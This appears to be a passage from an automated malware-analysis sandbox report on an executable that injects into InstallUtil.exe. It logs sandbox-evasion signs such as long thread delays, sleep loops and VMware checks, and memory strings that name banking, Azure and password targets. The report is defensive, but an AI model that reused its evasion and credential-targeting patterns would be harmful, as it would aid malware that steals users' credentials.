                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: OutputDebugStringW count: 1939
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory allocated: E20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory allocated: 49A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory allocated: 8160000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory allocated: 9160000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory allocated: 9340000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory allocated: A340000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory allocated: A6F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeMemory allocated: B6F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599282Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599157Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599047Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597499Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596667Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595719Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594160Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593990Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593862Jump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeWindow / User API: threadDelayed 2187Jump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeWindow / User API: threadDelayed 7642Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7583Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2248Jump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe TID: 1424Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe TID: 1424Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep count: 36 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1892Thread sleep count: 7583 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1892Thread sleep count: 2248 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -599657s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -599532s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -599407s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -599282s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -599157s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -599047s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -598922s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -598813s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -598704s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -598579s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -598469s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -598344s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -598110s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -597985s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -597860s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -597735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -597610s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -597499s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -597360s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -597250s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -597140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -597031s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -596667s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -596562s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -596438s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -596313s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -596188s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -596063s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -595938s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -595828s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -595719s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -595594s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -595485s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -595360s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -595235s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -595110s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -595000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -594891s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -594766s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -594657s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -594532s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -594407s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -594297s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -594160s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -593990s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1996Thread sleep time: -593862s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599282Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599157Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599047Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597499Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596667Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595719Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594160Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593990Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593862Jump to behavior
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                    Source: 5qJ6QQTcRS.exe, 00000000.00000002.1971799166.0000000005B60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: 1159399738GSOFTWARE\VMware, Inc.\VMware VGAuth
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003DFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                    Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003ADF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
